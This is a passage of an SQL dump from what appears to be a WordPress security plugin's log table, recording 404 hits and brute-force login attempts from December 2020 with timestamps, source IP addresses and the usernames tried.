05:56:29','39.101.1.61',NULL,NULL),(73978,'four_oh_four','2020-12-03 01:15:22','2020-12-03 06:15:22','185.206.214.71',NULL,NULL),(73979,'four_oh_four','2020-12-03 02:26:04','2020-12-03 07:26:04','178.214.245.131',NULL,NULL),(73980,'four_oh_four','2020-12-03 02:41:03','2020-12-03 07:41:03','114.119.130.104',NULL,NULL),(73981,'four_oh_four','2020-12-03 04:41:10','2020-12-03 09:41:10','174.20.11.100',NULL,NULL),(73982,'four_oh_four','2020-12-03 04:55:19','2020-12-03 09:55:19','40.77.167.32',NULL,NULL),(73983,'four_oh_four','2020-12-03 05:08:25','2020-12-03 10:08:25','37.115.113.102',NULL,NULL),(73984,'four_oh_four','2020-12-03 05:08:28','2020-12-03 10:08:28','37.115.113.102',NULL,NULL),(73985,'four_oh_four','2020-12-03 05:08:30','2020-12-03 10:08:30','37.115.113.102',NULL,NULL),(73986,'four_oh_four','2020-12-03 05:44:14','2020-12-03 10:44:14','39.101.1.61',NULL,NULL),(73987,'four_oh_four','2020-12-03 06:13:42','2020-12-03 11:13:42','114.119.134.41',NULL,NULL),(73988,'four_oh_four','2020-12-03 06:53:34','2020-12-03 11:53:34','5.196.23.219',NULL,NULL),(73989,'four_oh_four','2020-12-03 06:59:59','2020-12-03 11:59:59','5.188.48.10',NULL,NULL),(73990,'four_oh_four','2020-12-03 08:08:30','2020-12-03 13:08:30','194.110.114.54',NULL,NULL),(73991,'four_oh_four','2020-12-03 08:45:58','2020-12-03 13:45:58','114.119.151.107',NULL,NULL),(73992,'four_oh_four','2020-12-03 09:21:22','2020-12-03 14:21:22','178.159.37.139',NULL,NULL),(73993,'four_oh_four','2020-12-03 12:34:14','2020-12-03 17:34:14','217.171.147.164',NULL,NULL),(73994,'four_oh_four','2020-12-03 15:07:54','2020-12-03 20:07:54','95.216.28.251',NULL,NULL),(73995,'four_oh_four','2020-12-03 15:10:17','2020-12-03 20:10:17','184.154.139.17',NULL,NULL),(73996,'four_oh_four','2020-12-03 15:43:00','2020-12-03 20:43:00','46.4.157.125',NULL,NULL),(73997,'four_oh_four','2020-12-03 16:07:53','2020-12-03 21:07:53','114.119.151.107',NULL,NULL),(73998,'four_oh_four','2020-12-03 17:30:34','2020-12-03 22:30:34','94.103.92.140',NULL,NULL),(73999,'four_oh_four','2020-12-03 17:49:33','2020-12-03 22:49:33','207.46.13.52',NULL,NULL),(74000,'four_oh_four','2020-12-03 18:41:32','2020-12-03 23:41:32','82.193.104.168',NULL,NULL),(74001,'four_oh_four','2020-12-03 19:30:02','2020-12-04 00:30:02','195.123.209.118',NULL,NULL),(74002,'four_oh_four','2020-12-03 19:30:04','2020-12-04 00:30:04','195.123.209.118',NULL,NULL),(74003,'four_oh_four','2020-12-03 19:30:02','2020-12-04 00:30:02','195.123.209.118',NULL,NULL),(74004,'four_oh_four','2020-12-03 19:30:10','2020-12-04 00:30:10','195.123.209.118',NULL,NULL),(74005,'four_oh_four','2020-12-03 19:30:12','2020-12-04 00:30:12','195.123.209.118',NULL,NULL),(74006,'four_oh_four','2020-12-03 19:30:13','2020-12-04 00:30:13','195.123.209.118',NULL,NULL),(74007,'four_oh_four','2020-12-03 19:30:15','2020-12-04 00:30:15','195.123.209.118',NULL,NULL),(74008,'four_oh_four','2020-12-03 19:30:16','2020-12-04 00:30:16','195.123.209.118',NULL,NULL),(74009,'four_oh_four','2020-12-03 19:30:17','2020-12-04 00:30:17','195.123.209.118',NULL,NULL),(74010,'four_oh_four','2020-12-03 20:06:37','2020-12-04 01:06:37','109.248.200.192',NULL,NULL),(74011,'four_oh_four','2020-12-03 20:21:33','2020-12-04 01:21:33','195.123.209.118',NULL,NULL),(74012,'four_oh_four','2020-12-03 20:21:35','2020-12-04 01:21:35','195.123.209.118',NULL,NULL),(74013,'four_oh_four','2020-12-03 20:21:34','2020-12-04 01:21:34','195.123.209.118',NULL,NULL),(74014,'four_oh_four','2020-12-03 22:44:31','2020-12-04 03:44:31','188.122.82.146',NULL,NULL),(74015,'four_oh_four','2020-12-04 01:44:05','2020-12-04 06:44:05','52.201.182.91',NULL,NULL),(74016,'four_oh_four','2020-12-04 01:44:06','2020-12-04 06:44:06','52.201.182.91',NULL,NULL),(74017,'four_oh_four','2020-12-04 02:31:02','2020-12-04 07:31:02','40.77.167.32',NULL,NULL),(74018,'four_oh_four','2020-12-04 02:54:35','2020-12-04 07:54:35','114.119.136.66',NULL,NULL),(74019,'four_oh_four','2020-12-04 03:48:20','2020-12-04 08:48:20','145.255.22.45',NULL,NULL),(74020,'four_oh_four','2020-12-04 04:47:37','2020-12-04 09:47:37','40.77.167.32',NULL,NULL),(74021,'four_oh_four','2020-12-04 04:54:19','2020-12-04 09:54:19','178.159.37.104',NULL,NULL),(74022,'four_oh_four','2020-12-04 04:54:24','2020-12-04 09:54:24','178.159.37.104',NULL,NULL),(74023,'four_oh_four','2020-12-04 05:01:23','2020-12-04 10:01:23','94.25.229.55',NULL,NULL),(74024,'four_oh_four','2020-12-04 05:26:03','2020-12-04 10:26:03','5.188.210.18',NULL,NULL),(74025,'four_oh_four','2020-12-04 06:15:59','2020-12-04 11:15:59','212.129.54.164',NULL,NULL),(74026,'four_oh_four','2020-12-04 06:53:18','2020-12-04 11:53:18','5.34.180.192',NULL,NULL),(74027,'four_oh_four','2020-12-04 06:53:22','2020-12-04 11:53:22','5.34.180.192',NULL,NULL),(74028,'four_oh_four','2020-12-04 06:53:24','2020-12-04 11:53:24','5.34.180.192',NULL,NULL),(74029,'four_oh_four','2020-12-04 06:54:44','2020-12-04 11:54:44','114.119.145.125',NULL,NULL),(74030,'four_oh_four','2020-12-04 07:00:27','2020-12-04 12:00:27','114.119.158.13',NULL,NULL),(74031,'four_oh_four','2020-12-04 07:25:25','2020-12-04 12:25:25','199.66.201.19',NULL,NULL),(74032,'four_oh_four','2020-12-04 07:25:25','2020-12-04 12:25:25','199.66.201.19',NULL,NULL),(74033,'four_oh_four','2020-12-04 07:36:55','2020-12-04 12:36:55','162.214.108.152',NULL,NULL),(74034,'four_oh_four','2020-12-04 09:02:49','2020-12-04 14:02:49','5.3.169.222',NULL,NULL),(74035,'four_oh_four','2020-12-04 10:03:15','2020-12-04 15:03:15','37.115.113.102',NULL,NULL),(74036,'four_oh_four','2020-12-04 10:03:18','2020-12-04 15:03:18','37.115.113.102',NULL,NULL),(74037,'four_oh_four','2020-12-04 10:03:21','2020-12-04 15:03:21','37.115.113.102',NULL,NULL),(74038,'four_oh_four','2020-12-04 11:31:53','2020-12-04 16:31:53','178.159.37.104',NULL,NULL),(74039,'four_oh_four','2020-12-04 11:41:33','2020-12-04 16:41:33','185.66.41.54',NULL,NULL),(74040,'four_oh_four','2020-12-04 13:19:40','2020-12-04 18:19:40','193.106.30.100',NULL,NULL),(74041,'four_oh_four','2020-12-04 14:14:50','2020-12-04 19:14:50','114.119.158.13',NULL,NULL),(74042,'four_oh_four','2020-12-04 15:04:09','2020-12-04 20:04:09','184.154.139.19',NULL,NULL),(74043,'four_oh_four','2020-12-04 15:06:10','2020-12-04 20:06:10','184.154.139.19',NULL,NULL),(74044,'four_oh_four','2020-12-04 15:25:28','2020-12-04 20:25:28','46.118.231.209',NULL,NULL),(74045,'four_oh_four','2020-12-04 15:25:27','2020-12-04 20:25:27','46.118.231.209',NULL,NULL),(74046,'four_oh_four','2020-12-04 18:11:02','2020-12-04 23:11:02','77.245.124.70',NULL,NULL),(74047,'four_oh_four','2020-12-04 18:25:56','2020-12-04 23:25:56','193.106.30.100',NULL,NULL),(74048,'four_oh_four','2020-12-04 19:06:25','2020-12-05 00:06:25','37.115.113.102',NULL,NULL),(74049,'four_oh_four','2020-12-04 19:06:24','2020-12-05 00:06:24','37.115.113.102',NULL,NULL),(74050,'four_oh_four','2020-12-04 19:06:26','2020-12-05 00:06:26','37.115.113.102',NULL,NULL),(74051,'four_oh_four','2020-12-04 20:29:59','2020-12-05 01:29:59','46.4.83.150',NULL,NULL),(74052,'four_oh_four','2020-12-04 20:54:57','2020-12-05 01:54:57','193.106.30.100',NULL,NULL),(74053,'four_oh_four','2020-12-04 20:55:02','2020-12-05 01:55:02','193.106.30.100',NULL,NULL),(74054,'four_oh_four','2020-12-04 21:37:09','2020-12-05 02:37:09','204.101.61.82',NULL,NULL),(74055,'four_oh_four','2020-12-04 22:33:53','2020-12-05 03:33:53','46.243.220.226',NULL,NULL),(74056,'four_oh_four','2020-12-04 23:53:00','2020-12-05 04:53:00','95.143.21.214',NULL,NULL),(74057,'four_oh_four','2020-12-05 01:45:06','2020-12-05 06:45:06','52.201.182.91',NULL,NULL),(74058,'four_oh_four','2020-12-05 01:45:09','2020-12-05 06:45:09','52.201.182.91',NULL,NULL),(74059,'four_oh_four','2020-12-05 02:19:55','2020-12-05 07:19:55','5.188.84.251',NULL,NULL),(74060,'four_oh_four','2020-12-05 02:19:56','2020-12-05 07:19:56','5.188.84.251',NULL,NULL),(74061,'four_oh_four','2020-12-05 02:35:25','2020-12-05 07:35:25','207.46.13.130',NULL,NULL),(74062,'four_oh_four','2020-12-05 03:06:14','2020-12-05 08:06:14','114.119.158.13',NULL,NULL),(74063,'four_oh_four','2020-12-05 03:07:48','2020-12-05 08:07:48','72.49.49.11',NULL,NULL),(74064,'four_oh_four','2020-12-05 04:00:14','2020-12-05 09:00:14','193.106.30.100',NULL,NULL),(74065,'four_oh_four','2020-12-05 04:45:45','2020-12-05 09:45:45','114.119.143.145',NULL,NULL),(74066,'four_oh_four','2020-12-05 04:59:53','2020-12-05 09:59:53','207.46.13.130',NULL,NULL),(74067,'four_oh_four','2020-12-05 06:08:25','2020-12-05 11:08:25','114.119.145.125',NULL,NULL),(74068,'four_oh_four','2020-12-05 07:11:06','2020-12-05 12:11:06','193.106.30.100',NULL,NULL),(74069,'four_oh_four','2020-12-05 07:20:56','2020-12-05 12:20:56','5.188.84.59',NULL,NULL),(74070,'four_oh_four','2020-12-05 08:13:25','2020-12-05 13:13:25','178.159.37.49',NULL,NULL),(74071,'four_oh_four','2020-12-05 08:25:14','2020-12-05 13:25:14','66.249.65.180',NULL,NULL),(74072,'four_oh_four','2020-12-05 11:42:22','2020-12-05 16:42:22','193.106.30.100',NULL,NULL),(74073,'four_oh_four','2020-12-05 13:35:20','2020-12-05 18:35:20','77.246.159.39',NULL,NULL),(74074,'four_oh_four','2020-12-05 14:07:03','2020-12-05 19:07:03','114.119.134.41',NULL,NULL),(74075,'four_oh_four','2020-12-05 14:58:46','2020-12-05 19:58:46','212.227.174.234',NULL,NULL),(74076,'four_oh_four','2020-12-05 15:03:55','2020-12-05 20:03:55','184.154.139.18',NULL,NULL),(74077,'four_oh_four','2020-12-05 15:04:21','2020-12-05 20:04:21','5.188.84.218',NULL,NULL),(74078,'four_oh_four','2020-12-05 15:05:57','2020-12-05 20:05:57','85.187.128.7',NULL,NULL),(74079,'four_oh_four','2020-12-05 15:08:40','2020-12-05 20:08:40','195.211.239.254',NULL,NULL),(74080,'four_oh_four','2020-12-05 16:22:51','2020-12-05 21:22:51','193.106.30.100',NULL,NULL),(74081,'four_oh_four','2020-12-05 17:48:21','2020-12-05 22:48:21','114.119.158.13',NULL,NULL),(74082,'four_oh_four','2020-12-05 18:51:05','2020-12-05 23:51:05','193.106.30.100',NULL,NULL),(74083,'four_oh_four','2020-12-05 19:59:19','2020-12-06 00:59:19','193.106.30.100',NULL,NULL),(74084,'four_oh_four','2020-12-05 20:09:55','2020-12-06 01:09:55','109.248.13.247',NULL,NULL),(74085,'four_oh_four','2020-12-05 20:46:49','2020-12-06 01:46:49','5.188.210.18',NULL,NULL),(74086,'four_oh_four','2020-12-05 22:20:45','2020-12-06 03:20:45','46.118.231.209',NULL,NULL),(74087,'four_oh_four','2020-12-05 22:20:48','2020-12-06 03:20:48','46.118.231.209',NULL,NULL),(74088,'four_oh_four','2020-12-05 22:20:51','2020-12-06 03:20:51','46.118.231.209',NULL,NULL),(74089,'four_oh_four','2020-12-05 23:03:18','2020-12-06 04:03:18','193.106.30.100',NULL,NULL),(74090,'four_oh_four','2020-12-05 23:15:59','2020-12-06 04:15:59','207.46.13.198',NULL,NULL),(74091,'four_oh_four','2020-12-06 00:36:17','2020-12-06 05:36:17','37.115.113.102',NULL,NULL),(74092,'four_oh_four','2020-12-06 00:36:16','2020-12-06 05:36:16','37.115.113.102',NULL,NULL),(74093,'four_oh_four','2020-12-06 00:36:18','2020-12-06 05:36:18','37.115.113.102',NULL,NULL),(74094,'four_oh_four','2020-12-06 01:46:59','2020-12-06 06:46:59','3.94.137.21',NULL,NULL),(74095,'four_oh_four','2020-12-06 01:47:02','2020-12-06 06:47:02','3.94.137.21',NULL,NULL),(74096,'four_oh_four','2020-12-06 02:22:52','2020-12-06 07:22:52','178.159.37.104',NULL,NULL),(74097,'four_oh_four','2020-12-06 02:29:14','2020-12-06 07:29:14','114.119.145.125',NULL,NULL),(74098,'four_oh_four','2020-12-06 02:50:24','2020-12-06 07:50:24','69.30.241.170',NULL,NULL),(74099,'four_oh_four','2020-12-06 03:24:42','2020-12-06 08:24:42','114.119.145.125',NULL,NULL),(74100,'four_oh_four','2020-12-06 03:41:53','2020-12-06 08:41:53','46.119.63.22',NULL,NULL),(74101,'four_oh_four','2020-12-06 03:56:32','2020-12-06 08:56:32','5.188.210.18',NULL,NULL),(74102,'four_oh_four','2020-12-06 03:59:39','2020-12-06 08:59:39','5.8.16.100',NULL,NULL),(74103,'four_oh_four','2020-12-06 04:10:09','2020-12-06 09:10:09','178.159.37.171',NULL,NULL),(74104,'four_oh_four','2020-12-06 04:30:57','2020-12-06 09:30:57','114.119.130.104',NULL,NULL),(74105,'four_oh_four','2020-12-06 04:49:06','2020-12-06 09:49:06','66.249.65.180',NULL,NULL),(74106,'four_oh_four','2020-12-06 05:14:19','2020-12-06 10:14:19','128.68.235.229',NULL,NULL),(74107,'four_oh_four','2020-12-06 06:21:02','2020-12-06 11:21:02','91.205.168.46',NULL,NULL),(74108,'four_oh_four','2020-12-06 07:06:07','2020-12-06 12:06:07','114.119.130.104',NULL,NULL),(74109,'four_oh_four','2020-12-06 07:10:47','2020-12-06 12:10:47','162.215.248.253',NULL,NULL),(74110,'four_oh_four','2020-12-06 07:47:19','2020-12-06 12:47:19','46.118.231.209',NULL,NULL),(74111,'four_oh_four','2020-12-06 07:47:21','2020-12-06 12:47:21','46.118.231.209',NULL,NULL),(74112,'four_oh_four','2020-12-06 07:47:20','2020-12-06 12:47:20','46.118.231.209',NULL,NULL),(74113,'four_oh_four','2020-12-06 07:55:26','2020-12-06 12:55:26','114.119.145.125',NULL,NULL),(74114,'four_oh_four','2020-12-06 09:14:08','2020-12-06 14:14:08','178.159.37.104',NULL,NULL),(74115,'four_oh_four','2020-12-06 09:14:07','2020-12-06 14:14:07','178.159.37.104',NULL,NULL),(74116,'four_oh_four','2020-12-06 09:14:09','2020-12-06 14:14:09','178.159.37.104',NULL,NULL),(74117,'four_oh_four','2020-12-06 10:08:42','2020-12-06 15:08:42','185.183.95.199',NULL,NULL),(74118,'four_oh_four','2020-12-06 10:27:23','2020-12-06 15:27:23','114.119.136.66',NULL,NULL),(74119,'four_oh_four','2020-12-06 10:43:22','2020-12-06 15:43:22','47.254.174.39',NULL,NULL),(74120,'four_oh_four','2020-12-06 11:45:28','2020-12-06 16:45:28','31.173.84.58',NULL,NULL),(74121,'four_oh_four','2020-12-06 11:51:41','2020-12-06 16:51:41','178.159.37.139',NULL,NULL),(74122,'four_oh_four','2020-12-06 12:04:51','2020-12-06 17:04:51','129.146.190.190',NULL,NULL),(74123,'four_oh_four','2020-12-06 12:18:26','2020-12-06 17:18:26','198.252.98.24',NULL,NULL),(74124,'four_oh_four','2020-12-06 13:29:20','2020-12-06 18:29:20','192.3.233.209',NULL,NULL),(74125,'four_oh_four','2020-12-06 13:31:03','2020-12-06 18:31:03','178.159.37.58',NULL,NULL),(74126,'four_oh_four','2020-12-06 15:05:33','2020-12-06 20:05:33','184.154.139.20',NULL,NULL),(74127,'four_oh_four','2020-12-06 15:14:42','2020-12-06 20:14:42','185.205.204.198',NULL,NULL),(74128,'four_oh_four','2020-12-06 16:19:11','2020-12-06 21:19:11','114.119.145.125',NULL,NULL),(74129,'four_oh_four','2020-12-06 17:19:29','2020-12-06 22:19:29','114.119.151.107',NULL,NULL),(74130,'four_oh_four','2020-12-06 19:45:18','2020-12-07 00:45:18','193.106.30.100',NULL,NULL),(74131,'four_oh_four','2020-12-06 20:23:49','2020-12-07 01:23:49','23.231.34.177',NULL,NULL),(74132,'four_oh_four','2020-12-06 20:23:55','2020-12-07 01:23:55','23.231.34.177',NULL,NULL),(74133,'four_oh_four','2020-12-06 20:23:58','2020-12-07 01:23:58','23.231.34.177',NULL,NULL),(74134,'four_oh_four','2020-12-06 20:24:02','2020-12-07 01:24:02','23.231.34.177',NULL,NULL),(74135,'four_oh_four','2020-12-06 21:31:38','2020-12-07 02:31:38','5.34.180.192',NULL,NULL),(74136,'four_oh_four','2020-12-06 21:31:38','2020-12-07 02:31:38','5.34.180.192',NULL,NULL),(74137,'four_oh_four','2020-12-06 21:31:40','2020-12-07 02:31:40','5.34.180.192',NULL,NULL),(74138,'four_oh_four','2020-12-07 00:07:52','2020-12-07 05:07:52','81.88.49.28',NULL,NULL),(74139,'four_oh_four','2020-12-07 00:18:58','2020-12-07 05:18:58','178.159.37.77',NULL,NULL),(74140,'brute_force','2020-12-07 01:30:00','2020-12-07 06:30:00','5.188.62.140',NULL,NULL),(74141,'brute_force','2020-12-07 01:30:00','2020-12-07 06:30:00',NULL,NULL,'adminu'),(74142,'four_oh_four','2020-12-07 01:48:42','2020-12-07 06:48:42','52.201.182.91',NULL,NULL),(74143,'four_oh_four','2020-12-07 01:48:45','2020-12-07 06:48:45','52.201.182.91',NULL,NULL),(74144,'brute_force','2020-12-07 02:05:50','2020-12-07 07:05:50','5.188.62.140',NULL,NULL),(74145,'brute_force','2020-12-07 02:05:50','2020-12-07 07:05:50',NULL,NULL,'adminu'),(74146,'brute_force','2020-12-07 02:41:21','2020-12-07 07:41:21','5.188.62.140',NULL,NULL),(74147,'brute_force','2020-12-07 02:41:21','2020-12-07 07:41:21',NULL,NULL,'adminu'),(74148,'four_oh_four','2020-12-07 02:57:57','2020-12-07 07:57:57','5.188.84.251',NULL,NULL),(74149,'four_oh_four','2020-12-07 02:58:15','2020-12-07 07:58:15','23.236.232.196',NULL,NULL),(74150,'four_oh_four','2020-12-07 02:59:39','2020-12-07 07:59:39','5.188.84.251',NULL,NULL),(74151,'four_oh_four','2020-12-07 02:59:47','2020-12-07 07:59:47','114.119.130.104',NULL,NULL),(74152,'four_oh_four','2020-12-07 03:03:02','2020-12-07 08:03:02','103.83.192.12',NULL,NULL),(74153,'brute_force','2020-12-07 03:18:35','2020-12-07 08:18:35','5.188.62.140',NULL,NULL),(74154,'brute_force','2020-12-07 03:18:35','2020-12-07 08:18:35',NULL,NULL,'adminu'),(74155,'brute_force','2020-12-07 04:00:08','2020-12-07 09:00:08','5.188.62.140',NULL,NULL),(74156,'brute_force','2020-12-07 04:00:08','2020-12-07 09:00:08',NULL,NULL,'adminu'),(74157,'brute_force','2020-12-07 05:24:28','2020-12-07 10:24:28','5.188.62.214',NULL,NULL),(74158,'brute_force','2020-12-07 05:24:28','2020-12-07 10:24:28',NULL,NULL,'adminu'),(74159,'brute_force','2020-12-07 05:24:33','2020-12-07 10:24:33','5.188.62.214',NULL,NULL),(74160,'brute_force','2020-12-07 05:24:33','2020-12-07 10:24:33',NULL,NULL,'admin@zphiblgz.org'),(74161,'four_oh_four','2020-12-07 05:38:50','2020-12-07 10:38:50','5.34.180.192',NULL,NULL),(74162,'four_oh_four','2020-12-07 05:38:49','2020-12-07 10:38:49','5.34.180.192',NULL,NULL),(74163,'four_oh_four','2020-12-07 05:38:51','2020-12-07 10:38:51','5.34.180.192',NULL,NULL),(74164,'four_oh_four','2020-12-07 05:40:02','2020-12-07 10:40:02','114.119.134.41',NULL,NULL),(74165,'brute_force','2020-12-07 05:48:13','2020-12-07 10:48:13','5.188.62.214',NULL,NULL),(74166,'brute_force','2020-12-07 05:48:13','2020-12-07 10:48:13',NULL,NULL,'adminu'),(74167,'brute_force','2020-12-07 05:48:17','2020-12-07 10:48:17','5.188.62.214',NULL,NULL),(74168,'brute_force','2020-12-07 05:48:17','2020-12-07 10:48:17',NULL,NULL,'admin@zphiblgz.org'),(74169,'brute_force','2020-12-07 06:11:53','2020-12-07 11:11:53','5.188.62.214',NULL,NULL),(74170,'brute_force','2020-12-07 06:11:53','2020-12-07 11:11:53',NULL,NULL,'adminu'),(74171,'brute_force','2020-12-07 06:11:57','2020-12-07 11:11:57','5.188.62.214',NULL,NULL),(74172,'brute_force','2020-12-07 06:11:57','2020-12-07 11:11:57',NULL,NULL,'admin@zphiblgz.org'),(74173,'brute_force','2020-12-07 06:35:46','2020-12-07 11:35:46','5.188.62.214',NULL,NULL),(74174,'brute_force','2020-12-07 06:35:46','2020-12-07 11:35:46',NULL,NULL,'adminu'),(74175,'brute_force','2020-12-07 06:35:50','2020-12-07 11:35:50','5.188.62.214',NULL,NULL),(74176,'brute_force','2020-12-07 06:35:50','2020-12-07 11:35:50',NULL,NULL,'admin@zphiblgz.org'),(74177,'brute_force','2020-12-07 07:00:08','2020-12-07 12:00:08','5.188.62.214',NULL,NULL),(74178,'brute_force','2020-12-07 07:00:08','2020-12-07 12:00:08',NULL,NULL,'adminu'),(74179,'brute_force','2020-12-07 07:00:17','2020-12-07 12:00:17','5.188.62.214',NULL,NULL),(74180,'brute_force','2020-12-07 07:00:17','2020-12-07 12:00:17',NULL,NULL,'admin@zphiblgz.org'),(74181,'four_oh_four','2020-12-07 07:15:39','2020-12-07 12:15:39','45.10.232.134',NULL,NULL),(74182,'brute_force','2020-12-07 07:24:55','2020-12-07 12:24:55','5.188.62.214',NULL,NULL),(74183,'brute_force','2020-12-07 07:24:55','2020-12-07 12:24:55',NULL,NULL,'adminu'),(74184,'brute_force','2020-12-07 07:25:00','2020-12-07 12:25:00','5.188.62.214',NULL,NULL),(74185,'brute_force','2020-12-07 07:25:00','2020-12-07 12:25:00',NULL,NULL,'admin@zphiblgz.org'),(74186,'brute_force','2020-12-07 07:51:01','2020-12-07 12:51:01','5.188.62.214',NULL,NULL),(74187,'brute_force','2020-12-07 07:51:01','2020-12-07 12:51:01',NULL,NULL,'adminu'),(74188,'brute_force','2020-12-07 08:22:07','2020-12-07 13:22:07','5.188.62.214',NULL,NULL),(74189,'brute_force','2020-12-07 08:22:07','2020-12-07 13:22:07',NULL,NULL,'adminu'),(74190,'brute_force','2020-12-07 08:22:12','2020-12-07 13:22:12','5.188.62.214',NULL,NULL),(74191,'brute_force','2020-12-07 08:22:12','2020-12-07 13:22:12',NULL,NULL,'admin@zphiblgz.org'),(74192,'four_oh_four','2020-12-07 08:31:56','2020-12-07 13:31:56','114.119.157.110',NULL,NULL),(74193,'brute_force','2020-12-07 08:55:15','2020-12-07 13:55:15','5.188.62.214',NULL,NULL),(74194,'brute_force','2020-12-07 08:55:15','2020-12-07 13:55:15',NULL,NULL,'adminu'),(74195,'brute_force','2020-12-07 08:55:20','2020-12-07 13:55:20','5.188.62.214',NULL,NULL),(74196,'brute_force','2020-12-07 08:55:20','2020-12-07 13:55:20',NULL,NULL,'admin@zphiblgz.org'),(74197,'four_oh_four','2020-12-07 10:17:53','2020-12-07 15:17:53','5.188.84.92',NULL,NULL),(74198,'four_oh_four','2020-12-07 11:22:41','2020-12-07 16:22:41','5.188.84.230',NULL,NULL),(74199,'four_oh_four','2020-12-07 11:26:01','2020-12-07 16:26:01','93.75.38.205',NULL,NULL),(74200,'four_oh_four','2020-12-07 11:28:39','2020-12-07 16:28:39','195.123.209.118',NULL,NULL),(74201,'four_oh_four','2020-12-07 11:28:39','2020-12-07 16:28:39','195.123.209.118',NULL,NULL),(74202,'four_oh_four','2020-12-07 11:28:39','2020-12-07 16:28:39','195.123.209.118',NULL,NULL),(74203,'four_oh_four','2020-12-07 11:28:41','2020-12-07 16:28:41','195.123.209.118',NULL,NULL),(74204,'four_oh_four','2020-12-07 11:28:41','2020-12-07 16:28:41','195.123.209.118',NULL,NULL),(74205,'four_oh_four','2020-12-07 11:28:41','2020-12-07 16:28:41','195.123.209.118',NULL,NULL),(74206,'four_oh_four','2020-12-07 11:28:43','2020-12-07 16:28:43','195.123.209.118',NULL,NULL),(74207,'four_oh_four','2020-12-07 11:28:42','2020-12-07 16:28:42','195.123.209.118',NULL,NULL),(74208,'four_oh_four','2020-12-07 11:28:42','2020-12-07 16:28:42','195.123.209.118',NULL,NULL),(74209,'four_oh_four','2020-12-07 11:35:59','2020-12-07 16:35:59','94.155.33.88',NULL,NULL),(74210,'four_oh_four','2020-12-07 11:36:02','2020-12-07 16:36:02','94.155.33.88',NULL,NULL),(74211,'four_oh_four','2020-12-07 11:36:05','2020-12-07 16:36:05','94.155.33.88',NULL,NULL),(74212,'four_oh_four','2020-12-07 11:36:09','2020-12-07 16:36:09','94.155.33.88',NULL,NULL),(74213,'four_oh_four','2020-12-07 11:41:11','2020-12-07 16:41:11','50.116.88.119',NULL,NULL),(74214,'four_oh_four','2020-12-07 12:01:30','2020-12-07 17:01:30','195.123.209.118',NULL,NULL),(74215,'four_oh_four','2020-12-07 12:01:32','2020-12-07 17:01:32','195.123.209.118',NULL,NULL),(74216,'four_oh_four','2020-12-07 12:01:31','2020-12-07 17:01:31','195.123.209.118',NULL,NULL),(74217,'brute_force','2020-12-07 13:14:44','2020-12-07 18:14:44','5.188.62.140',NULL,NULL),(74218,'brute_force','2020-12-07 13:14:44','2020-12-07 18:14:44',NULL,NULL,'adminu'),(74219,'brute_force','2020-12-07 13:14:51','2020-12-07 18:14:51','5.188.62.140',NULL,NULL),(74220,'brute_force','2020-12-07 13:14:51','2020-12-07 18:14:51',NULL,NULL,'admin'),(74221,'brute_force','2020-12-07 13:17:41','2020-12-07 18:17:41','5.188.62.140',NULL,NULL),(74222,'brute_force','2020-12-07 13:17:41','2020-12-07 18:17:41',NULL,NULL,'adminu'),(74223,'brute_force','2020-12-07 13:17:47','2020-12-07 18:17:47','5.188.62.140',NULL,NULL),(74224,'brute_force','2020-12-07 13:17:47','2020-12-07 18:17:47',NULL,NULL,'zphiblgz'),(74225,'brute_force','2020-12-07 13:20:44','2020-12-07 18:20:44','5.188.62.140',NULL,NULL),(74226,'brute_force','2020-12-07 13:20:44','2020-12-07 18:20:44',NULL,NULL,'adminu'),(74227,'brute_force','2020-12-07 13:20:47','2020-12-07 18:20:47','5.188.62.140',NULL,NULL),(74228,'brute_force','2020-12-07 13:20:47','2020-12-07 18:20:47',NULL,NULL,'zphiblgz'),(74229,'brute_force','2020-12-07 13:23:33','2020-12-07 18:23:33','5.188.62.140',NULL,NULL),(74230,'brute_force','2020-12-07 13:23:33','2020-12-07 18:23:33',NULL,NULL,'adminu'),(74231,'brute_force','2020-12-07 13:23:37','2020-12-07 18:23:37','5.188.62.140',NULL,NULL),(74232,'brute_force','2020-12-07 13:23:37','2020-12-07 18:23:37',NULL,NULL,'admin'),(74233,'brute_force','2020-12-07 13:26:15','2020-12-07 18:26:15','5.188.62.140',NULL,NULL),(74234,'brute_force','2020-12-07 13:26:15','2020-12-07 18:26:15',NULL,NULL,'adminu'),(74235,'brute_force','2020-12-07 13:26:18','2020-12-07 18:26:18','5.188.62.140',NULL,NULL),(74236,'brute_force','2020-12-07 13:26:18','2020-12-07 18:26:18',NULL,NULL,'admin'),(74237,'brute_force','2020-12-07 13:29:06','2020-12-07 18:29:06','5.188.62.140',NULL,NULL),(74238,'brute_force','2020-12-07 13:29:06','2020-12-07 18:29:06',NULL,NULL,'adminu'),(74239,'brute_force','2020-12-07 13:29:09','2020-12-07 18:29:09','5.188.62.140',NULL,NULL),(74240,'brute_force','2020-12-07 13:29:09','2020-12-07 18:29:09',NULL,NULL,'admin'),(74241,'brute_force','2020-12-07 13:31:36','2020-12-07 18:31:36','5.188.62.140',NULL,NULL),(74242,'brute_force','2020-12-07 13:31:36','2020-12-07 18:31:36',NULL,NULL,'adminu'),(74243,'brute_force','2020-12-07 13:31:40','2020-12-07 18:31:40','5.188.62.140',NULL,NULL),(74244,'brute_force','2020-12-07 13:31:40','2020-12-07 18:31:40',NULL,NULL,'admin'),(74245,'brute_force','2020-12-07 13:34:04','2020-12-07 18:34:04','5.188.62.140',NULL,NULL),(74246,'brute_force','2020-12-07 13:34:04','2020-12-07 18:34:04',NULL,NULL,'adminu'),(74247,'four_oh_four','2020-12-07 13:37:05','2020-12-07 18:37:05','52.87.248.108',NULL,NULL),(74248,'brute_force','2020-12-07 13:49:05','2020-12-07 18:49:05','5.188.62.140',NULL,NULL),(74249,'brute_force','2020-12-07 13:49:05','2020-12-07 18:49:05',NULL,NULL,'adminu'),(74250,'brute_force','2020-12-07 13:49:09','2020-12-07 18:49:09','5.188.62.140',NULL,NULL),(74251,'brute_force','2020-12-07 13:49:09','2020-12-07 18:49:09',NULL,NULL,'admin'),(74252,'brute_force','2020-12-07 13:52:07','2020-12-07 18:52:07','5.188.62.140',NULL,NULL),(74253,'brute_force','2020-12-07 13:52:07','2020-12-07 18:52:07',NULL,NULL,'adminu'),(74254,'brute_force','2020-12-07 13:52:13','2020-12-07 18:52:13','5.188.62.140',NULL,NULL),(74255,'brute_force','2020-12-07 13:52:13','2020-12-07 18:52:13',NULL,NULL,'admin'),(74256,'brute_force','2020-12-07 13:54:59','2020-12-07 18:54:59','5.188.62.140',NULL,NULL),(74257,'brute_force','2020-12-07 13:54:59','2020-12-07 18:54:59',NULL,NULL,'adminu'),(74258,'brute_force','2020-12-07 13:55:03','2020-12-07 